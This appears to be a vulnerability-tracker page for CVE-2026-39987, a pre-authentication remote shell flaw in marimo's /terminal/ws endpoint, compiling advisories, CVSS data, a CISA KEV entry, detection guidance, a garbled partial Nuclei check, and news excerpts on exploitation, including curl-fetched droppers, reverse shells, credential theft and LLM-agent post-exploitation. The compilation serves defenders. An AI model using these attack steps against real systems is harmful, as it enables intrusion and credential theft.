CVE-2026-39987
published 2026-04-09CVE-2026-39987: marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint /terminal/ws lacks…
PriorityP1100critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2026-05-07
Exploited in the wild
EPSS
95.64%
99.9th percentile
marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands. Unlike other WebSocket endpoints (e.g., /ws) that correctly call validate_auth() for authentication, the /terminal/ws endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification. This vulnerability is fixed in 0.23.0.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| coreweave | marimo | < 0.23.0 | 0.23.0 |
| marimo-team | marimo | < 0.23.0 | 0.23.0 |
| marimo-team | marimo | >= 0 < 0.23.0 | 0.23.0 |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor and alert on unauthenticated WebSocket connections to the /terminal/ws endpoint; legitimate Marimo deployments should require authentication via validate_auth() before accepting connections. ↗
- →Detect curl commands downloading scripts from Hugging Face Spaces (huggingface.co) immediately following a /terminal/ws WebSocket connection, as this pattern was used to deliver the NKAbuse dropper. ↗
- →Hunt for systemd unit creation, cron job additions, or macOS LaunchAgent entries spawned from the Marimo process, as the NKAbuse dropper establishes persistence via these mechanisms. ↗
- →Detect rapid sequential AWS Secrets Manager API calls originating from a Marimo host, especially when followed by SSH sessions to a bastion server — indicative of LLM-agent-driven post-exploitation. ↗
- →Flag command streams containing '---' delimiters between commands with stderr discarded and 'less' disabled — a machine-consumption pattern associated with LLM agent post-exploitation activity. ↗
- →Monitor for multiple reverse-shell attempts across different ports originating from a single source IP after /terminal/ws exploitation, as one observed actor attempted 15 reverse-shell techniques across multiple ports. ↗
- →Detect PostgreSQL connections and rapid schema/table enumeration initiated from the Marimo process environment, as attackers pivoted to lateral movement by extracting database credentials from environment variables. ↗
- →Recorded Future created Nuclei templates to detect CVE-2026-39987 (missing authentication on /terminal/ws); these are available to Recorded Future customers for scanning exposed Marimo instances. ↗
- ·The vulnerability only affects Marimo instances deployed in edit mode with network exposure; users who expose Marimo to a shared network using --host 0.0.0.0 while in edit mode are at risk. ↗
- ·All Marimo versions prior to 0.23.0 (specifically 0.20.4 and earlier per exploitation reports) are vulnerable; the fix is exclusively in version 0.23.0 and later. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.3CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
cisa9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Marimo Remote Code Execution Vulnerability
cisa·2026-04-23·CVSS 9.3
CVE-2026-39987 [CRITICAL] CWE-306 Marimo Remote Code Execution Vulnerability
Vulnerability: Marimo Remote Code Execution Vulnerability
Affected: Marimo Marimo
Marimo contains an pre-authorization remote code execution vulnerability, allowing an unauthenticated attacked to shell access and execute arbitrary system commands.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xc ; https://nvd.nist.gov/vuln/detail/CVE-2026-39987
Remediation Due Date: 2026-05-07
VulDB
marimo-team marimo up to 0.22.x WebSocket Endpoint /terminal/ws validate_auth missing authentication
vuldb·2026-04-09·CVSS 9.3
CVE-2026-39987 [CRITICAL] marimo-team marimo up to 0.22.x WebSocket Endpoint /terminal/ws validate_auth missing authentication
A vulnerability, which was classified as critical, has been found in marimo-team marimo up to 0.22.x. This vulnerability affects the function validate_auth of the file /terminal/ws of the component WebSocket Endpoint. This manipulation causes missing authentication.
This vulnerability appears as CVE-2026-39987. The attack may be initiated remotely. There is no available exploit.
It is advisable to upgrade the affected component.
OSV
Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
osv·2026-04-08
CVE-2026-39987 [CRITICAL] Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
## Summary
Marimo (19.6k stars) has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint `/terminal/ws` lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands.
Unlike other WebSocket endpoints (e.g., `/ws`) that correctly call `validate_auth()` for authentication, the `/terminal/ws` endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification.
## Affected Versions
Marimo None:
app_state = AppState(websocket)
if app_state.mode != SessionMode.EDIT:
await websocket.close(...)
return
if not supports_terminal():
await websocket.close(...)
return
GHSA
Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
ghsa·2026-04-08
CVE-2026-39987 [CRITICAL] CWE-306 Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
Marimo: Pre-Auth Remote Code Execution via Terminal WebSocket Authentication Bypass
## Summary
Marimo (19.6k stars) has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint `/terminal/ws` lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands.
Unlike other WebSocket endpoints (e.g., `/ws`) that correctly call `validate_auth()` for authentication, the `/terminal/ws` endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification.
## Affected Versions
Marimo None:
app_state = AppState(websocket)
if app_state.mode != SessionMode.EDIT:
await websocket.close(...)
return
if not supports_terminal():
await websocket.close(...)
return
VulnCheck
Missing Authentication for Critical Function
vulncheck·2026·CVSS 9.3
CVE-2026-39987 [CRITICAL] Missing Authentication for Critical Function
Missing Authentication for Critical Function
marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands. Unlike other WebSocket endpoints (e.g., /ws) that correctly call validate_auth() for authentication, the /terminal/ws endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification. This vulnerability is fixed in 0.23.0.
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
No detection rules found.
Nuclei
Marimo <= 0.20.4 - Pre-Auth Terminal WebSocket RCE
nuclei·CVSS 9.3
CVE-2026-39987 [CRITICAL] Marimo <= 0.20.4 - Pre-Auth Terminal WebSocket RCE
Marimo 0) {
output += chunk;
}
if (output.indexOf("uid=") !== -1) {
break;
}
}
conn.Close();
Export(upgradeResp + output);
}
args:
target_host: "{{Host}}"
target_port: "{{Port}}"
matchers-condition: and
matchers:
- type: regex
regex:
- "uid=\\d+\\([^)]+\\)"
- type: dsl
dsl:
- "success == true"
extractors:
- type: regex
regex:
- "uid=\\d+\\([^)]+\\)"
# digest: 4a0a00473045022100c6a08283f9ffe53982ee1e7ef08017afcd4df20cf4c2eeceba79652166ff9cb80220529010aab9a093ec0e4f6ab3de329aee2c366e8c771cee5c307714fcb2ee1f0c:922c64590222798bb761d5b6d8e72950
Hackernews
Researchers Build Self-Replicating AI Worm That Operates Entirely on Local, Open-Weight Models
blogs_hackernews·2026-06-09
CVE-2026-39987 Researchers Build Self-Replicating AI Worm That Operates Entirely on Local, Open-Weight Models
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## Researchers Build Self-Replicating AI Worm That Operates Entirely on Local, Open-Weight Models
University of Toronto researchers have built and tested a proof-of-concept AI-driven computer worm that uses a locally hosted open-weight large language model to reason its way through a network, generate tailored attack strategies for each target it encounters, and replicate itself, all without human intervention and without touching a commercial AI service.
The preprint, posted to arXiv on June 2 and currently under peer review, shows why single-CVE patching breaks down when malware can inspect exposed services, read fresh adviso
Hackernews
Attackers Use LLM Agent for Post-Exploitation After Marimo CVE-2026-39987 Exploit
blogs_hackernews·2026-05-29·CVSS 9.3
CVE-2026-39987 [CRITICAL] Attackers Use LLM Agent for Post-Exploitation After Marimo CVE-2026-39987 Exploit
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## Attackers Use LLM Agent for Post-Exploitation After Marimo CVE-2026-39987 Exploit
An unknown threat actor has been observed using a large language model (LLM) agent to conduct post-compromise actions after obtaining initial access following the exploitation of a publicly-accessible Marimo network using a recently disclosed vulnerability.
"The attacker compromised an internet-reachable Marimo notebook via CVE-2026-39987, extracted two cloud credentials from the compromised host, replayed them through a fanned-out egress pool to retrieve an SSH private key from AWS Secrets Manager, and used that key to drive eight short SSH se
Recorded Future
April 2026 CVE Landscape
blogs_recorded_future·2026-05-15·CVSS 9.8
CVE-2026-33032 [CRITICAL] April 2026 CVE Landscape
## April 2026 CVE Landscape
In April 2026, Insikt Group® identified 37 high-impact vulnerabilities that should be prioritized for remediation , 35 of which had a Very Critical Recorded Future Risk Score. This represents a 19% increase from last month.
31 of the 37 were included in the US Cybersecurity and Infrastructure Security Agency (CISA)’s Known Exploited Vulnerabilities (KEV) catalog, and six were surfaced only through honeypot data. Those six CVEs associated with honeypots are available only to Recorded Future customers.
Those 37 vulnerabilities affected products from 23 vendors. Microsoft accounted for approximately 22%, while the remaining exposure was concentrated across a range of enterprise-facing vendors, particularly security and systems management tools, collaboration and
Bleepingcomputer
Hackers exploit Marimo flaw to deploy NKAbuse malware from Hugging Face
blogs_bleepingcomputer·2026-04-16·CVSS 9.3
CVE-2026-39987 [CRITICAL] Hackers exploit Marimo flaw to deploy NKAbuse malware from Hugging Face
## Hackers exploit Marimo flaw to deploy NKAbuse malware from Hugging Face
## Bill Toulas
Hackers are exploiting a critical vulnerability in Marimo reactive Python notebook to deploy a new variant of NKAbuse malware hosted on Hugging Face Spaces.
Attacks leveraging the remote code execution flaw (CVE-2026-39987) started last week for credential theft, less than 10 hours after technical details were disclosed publicly, according to data from cloud-security company Sysdig.
Sysdig researchers continued to monitor activity related to the security issue identified additional attacks, including a campaign that started on April 12 that abuses the Hugging Face Spaces platform for showcasing AI applications.
Hugging Face serves as an AI development and machine learning-focused platform, acting
Checkpoint
13th April – Threat Intelligence Report
blogs_checkpoint·2026-04-13
CVE-2026-1340 13th April – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 13th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 13th April, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
The Los Angeles Police Department has reported a data breach involving a digital storage system used by the L.A. City Attorney’s Office. The exposure included 7.7 terabytes and more than 337,000 files, including personnel records, internal affairs material, and unredacted personal information.
ChipSoft, a Dutch healthcare sof
Hackernews
⚡ Weekly Recap: Fiber Optic Spying, Windows Rootkit, AI Vulnerability Hunting and More
blogs_hackernews·2026-04-13·CVSS 8.6
[HIGH] ⚡ Weekly Recap: Fiber Optic Spying, Windows Rootkit, AI Vulnerability Hunting and More
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: Fiber Optic Spying, Windows Rootkit, AI Vulnerability Hunting and More
Monday is back, and the weekend’s backlog of chaos is officially hitting the fan. We are tracking a critical zero-day that has been quietly living in your PDFs for months, plus some aggressive state-sponsored meddling in infrastructure that is finally coming to light. It is one of those mornings where the gap between a quiet shift and a full-blown incident response is basically non-existent.
The variety this week is particularly nasty. We have AI models being turned into autonomous exploit engines, North Korean groups playing the long game
Bleepingcomputer
Critical Marimo pre-auth RCE flaw now under active exploitation
blogs_bleepingcomputer·2026-04-12·CVSS 9.3
CVE-2026-39987 [CRITICAL] Critical Marimo pre-auth RCE flaw now under active exploitation
## Critical Marimo pre-auth RCE flaw now under active exploitation
## Bill Toulas
Hackers started exploiting a critical vulnerability in the Marimo open-source reactive Python notebook platform just 10 hours after its public disclosure.
The flaw allows remote code execution without authentication in Marimo versions 0.20.4 and earlier. It tracked as CVE-2026-39987 and GitHub assessed it with a critical score of 9.3 out of 10.
According to researchers at cloud-security company Sysdig, attackers created an exploit from the information in the developer's advisory and immediately started using it in attacks that exfiltrated sensitive information.
Marimo is an open-source Python notebook environment, typically used by data scientists, ML/AI practitioners, researchers, and developers buildin
Hackernews
Marimo RCE Flaw CVE-2026-39987 Exploited Within 10 Hours of Disclosure
blogs_hackernews·2026-04-10·CVSS 9.3
CVE-2026-39987 [CRITICAL] Marimo RCE Flaw CVE-2026-39987 Exploited Within 10 Hours of Disclosure
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## Marimo RCE Flaw CVE-2026-39987 Exploited Within 10 Hours of Disclosure
A critical security vulnerability in Marimo , an open-source Python notebook for data science and analysis, has been exploited within 10 hours of public disclosure, according to findings from Sysdig.
The vulnerability in question is CVE-2026-39987 (CVSS score: 9.3), a pre-authenticated remote code execution vulnerability impacting all versions of Marimo prior to and including 0.20.4. The issue has been addressed in version 0.23.0 .
"The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtai
Wiz
CVE-2026-39987 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
CVE-2026-39987 [CRITICAL] CVE-2026-39987 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-39987 :
Python vulnerability analysis and mitigation
marimo is a reactive Python notebook. Prior to 0.23.0, Marimo has a Pre-Auth RCE vulnerability. The terminal WebSocket endpoint /terminal/ws lacks authentication validation, allowing an unauthenticated attacker to obtain a full PTY shell and execute arbitrary system commands. Unlike other WebSocket endpoints (e.g., /ws) that correctly call validate_auth() for authentication, the /terminal/ws endpoint only checks the running mode and platform support before accepting connections, completely skipping authentication verification. This vulnerability is fixed in 0.23.0.
Source : NVD
## 9.3
Score
Published April 9, 2026
Severity CRITICAL
CNA Score 9.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Ex
https://github.com/marimo-team/marimo/commit/c24d4806398f30be6b12acd6c60d1d7c68cfd12ahttps://github.com/marimo-team/marimo/pull/9098https://github.com/marimo-team/marimo/security/advisories/GHSA-2679-6mx9-h9xchttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-39987https://www.sysdig.com/blog/marimo-oss-python-notebook-rce-from-disclosure-to-exploitation-in-under-10-hours
2026-04-09
Published
2026-04-23
Added to CISA KEV
Exploited in the wild